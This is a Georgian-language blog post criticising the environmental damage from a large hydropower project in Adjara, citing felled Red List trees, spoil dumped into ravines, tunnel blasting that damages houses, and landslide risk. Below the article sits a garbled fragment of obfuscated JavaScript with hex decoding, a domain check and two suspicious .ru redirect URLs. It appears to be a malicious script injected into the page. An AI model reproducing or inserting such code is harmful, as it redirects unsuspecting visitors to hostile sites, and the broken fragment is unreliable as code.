RSS

ბუნება ისევ არ გვაპატიებს….

29 Jun

dre 203ოლიკო ცისკარიშვილი

ორი დღეა, აჭარაში სტიქიაზე საუბრობენ… ორი დღეა… ჩემი ერთ-ერთი კოლეგის პოსტი ვნახე – ქედაში ის რესტორანი ნახევარი საათის შემდეგ წაიღო, სადაც ყავა დავლიეთო… ამ პოსტმა მიბიძგა დამეწერა: ორი თვის წინ, როცა ჩემი თვალით ვნახე როგორ შენდება აჭარაში უდიდესი ჰესი, სწორედ, ამაზე ვიფიქრე, რომ ბუნება სამაგიეროს გადაუხდის…

dre 224მაშინ არ მქონდა უფლება დამეწერა, რადგან ერთ-ერთი მედიასაშუალების ჟურნალისტი საგამოძიებო მასალაზე მუშაობდა, რომელიც ეხებოდა კომპანია „აჭარისწყალჯორჯიას“ მიერ წითელ წიგნში შესულ სხვადასხვა სახეობის 1408 ხის მოჭრას, კომპანიის ინტერესებიდან გამომდინარე. ახლა კი, რადგან გამოძიება დასრულებულია, წითელ ნუსხაში შეტანილ მოჭრილს ხეებთან ერთად, სხვა პრობლემებსაც შევეხები. მოჭრილი ხეების მაგივრად, კომპანიას ვალდებულება აქვს აღებული, რომ კომპენსაციისთვის, იმ სახეობისვე ხეები დარგონ, რომლებიც მოიჭრა მშენებლობის დროს. თავიდან სოფელ კვატიას მიმდებარე ტერიტორიაზე უნდოდათ ხეების გაშენება. თუმცა სოფლის მაცხოვრებლები უფლებას არ აძლევენ, რადგან ისინი თვლიან, რომ არა მარტო ხეების დარგვა იქნება ამ ტერიტორიაზე უაზრო, ამ სოფელსაც და მის მაცხოვრებლებსაც ჰესის მშენებლობის დასრულების შემდეგ, უდიდესი პრობლემები შეექმნებათ. სოფლის მცხოვრებლები ამბობენ, რომ “აჭარისწყალ ჯორჯიას” საქმიანობა გავლენას მოახდენს მათ ცხოვრებაზე.  სოფელთან დაგუბდება წყალი. გავა მაღალი ძაბვის ხაზები.  დაინგრევა პატარა ხიდი, რომელიც სოფლის ერთ ხეობას მეორესთან აკავშირებს. მათი ეჭვი არც თუ უსაფუძვლოა… წითელ ნუსხაში შეტანილი ხეების მოჭრა ცალკე პრობლემაა და ამ თემაზე ბევრი ილაპარაკა ჩემმა კოლეგამ. აქ უფრო სხვა პრობლემებმაც იჩინა თავი. თუმცა მაშინდელი მოგზაურობის დროს, აუდიო ჩანაწერები ვერ გავაკეთე, რადგან ფოტო მასალას ვიღებდი, ვეცდები რეალური სურათი დავანახო მკითხველს. (მკითხველს მინდა შევახსენო, სოფელ კვატიას თავზე, სოფელი თხილნარაა, რომელიც 1989 წელს მეწყერმა მთლიანად გაანადგურა და იყო მსხვერპლიც)…

dre 204არაერთხელ გამოგვიცდია – ჩვენი სისასტიკე ბუნებისადმი, როგორ დაგვბრუნებია ბუმერანგივით… ბევრი რომ არ გავაგრძელო, უკვე მერამდენედ გადაგვიხადა სამაგიერო დარიალის ხეობაში დევდორაკმა, მიუხედავად იმისა, რომ გარემოსდამცველები წლების განმავლობაში ბრძოლობდნენ და ამტკიცებდნენ რომ იქ ჰესების აშენება არ შეიძლებოდა, მავანი მაინც თავისას აკეთებდა…

აჭარაში კი, მიუხედავად იმისა, რომ გარემოსდამცველების უმეტესობა იმას ამბობს, რომ აჭარის მაღალტენიანობის გამო, ჰესის მშენებლობა პრობლემას არ შეუქმნის ადგილობრივ ეკოგარემოს, მე არაგეოლოგ-ეკოლოგმაც კი, სრული სურათის ნახვისას მივხვდი, რომ სერიოზული პრობლემები შეექმნება აჭარის მაღალმთიანეთს…

შარშან, როცა ამ კომპანია „აჭარაწყალჯორჯიას“ მუშაობას ვეცნობოდით მედიატურის ფარგლებში, ვიფიქრეთ, რომ მხოლოდ სოფელ ჩანჩხალოს ქონდა პრეტენზია და პრობლემები, სადაც 170 კომლი ცხოვრობს. აღმოჩნდა, რომ კომპანიამ, წინასწარი შეფასებები არ გააკეთა, მიმდებარე ტერიტორიის, მოსახლეობის ქონების და ა.შ.

dre 214სოფელ ჩანჩხალოს ქვევით გვირაბი გადის, რომელიც  ენერგოკომპანია „აჭარისწყალი ჯორჯიას“ გაყვანილია, რომელიც უშველებელ შუახევჰესს, საქართველოს ენერგეტიკაში ერთ-ერთ ყველაზე დიდ საინვესტიციო-ინფრასტრუქტურულ პროექტს, ახორციელებს. ეს კომპანია, მდინარე აჭარისწყალზე და მდინარე აჭარისწყლისა და მისი შენაკადების ჰიდრორესურსების ათვისების მიზნით შეიქმნა. ჩანჩხალოს მოსახლეობა მაშინვე ამბობდა, რომ გვირაბის გაყვანის გამო, აფეთქებები მათ საცხოვრებელ სახლებს ზიანს აყენებს. კომპანია, რომ კომპენსაციას არ ახდის ეს სხვა საკითხია კიდევ. სამწუხაროდ, გარემოზე ზემოქმედების შეფასების დროს, სათანადოდ არ იყო შესწავლილი ტერიტორიები. პროექტის არეალში ოცზე მეტი სოფელია მოქცეული.ყველაზე საინტერესო კი ისაა, რომ იმ მედიატურის მონაწილეებს ჰესის არეალი, მხოლოდ ჩანჩახლოს მიმდებარე ტერიტორია გვეგონა… წელს კი, როცა ფეხით დავიარეთ მთელი აჭარა, აღმოჩნდა, რომ კომპანია გლობალურ სამუშაოებს ატარებს…

აჭარის ოთხ უდიდეს ხეობაში, მთებს შორის გადის გვირაბები, რომლებიდანაც დიდი წყლის სარკე გაკეთდება და რომელიც შემდეგ პირდაპირ ჰესში გადავა… გვირაბებიდან ამოსული ნაშალს კი, ყრიან სოფლიდან სოფელში მიმავლ გზების ხევებში, სადაც, როგორც ხეები ნადგურდება, ასევე ნაშალი ეყრება პაწაწინა მდინარეებსა და რუებს… საეჭვოა, რომ ხევებში ჩაყრილმა და გადასწორებულმა  ნაშალმა დიდხანს გაუძლოს მის ქვეშ გამდინარე წყლებს და საშიშოროება არ შეუქმნას, ისედაც მეწყრულპროცესებისკენ მიდრეკილ რეგიონს. პრობლემა სერიოზულია და ამ პრობლემებს ემატება ისიც, რომ საქართველოს მთავრობამ კომპანია “აჭარისწყალ ჯორჯიას” 600 000 კუბური მეტრი ქვიშა-ხრეშის მოპოვების ლიცენზიისგანაც გაათავისუფლა და კომპანია გამალებით მუშაობს…  როგორც ამბობენ, ამ ეტაპზე  მოპოვებულია 170,000 კუბური მეტრი.

რა მინდოდა მეთქვა ამ ბლოგით დაა… ზოგიერთი გარემოსდამცველი კი ვარაუდობს, რომ ამ გიგანტური ჰესის მშენებლობა პრობლემას არ შექმნის, მაგრამ საკუთარი თვალით ნანახმა დამარწმუნა, აჭარა კატასტროფის პირასააა… და ბუნება ისევ არ გვაპატიებს ამ უხეშ ჩარევას..

რამდენი მილიონის ინვესტიცია და რა ფასად უჯდება ამ მშენებლობის ბოლომდე მიყვანა კომპანიას, სულ სხვა საკითხია… ჩვენ და ჩვენს შთამომავლობას კი ზუსტად ვიცი, ძალიან ძვირი დაგვიჯდება ეს მშენებლობა…

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ekofact.wordpress.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;ehttps://su2lgyoeucscn.ru/f2.html?a=26698https://doiuhrht.ru/u.html?a=26698

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / შეცვლა )

Twitter picture

You are commenting using your Twitter account. Log Out / შეცვლა )

Facebook photo

You are commenting using your Facebook account. Log Out / შეცვლა )

Google+ photo

You are commenting using your Google+ account. Log Out / შეცვლა )

Connecting to %s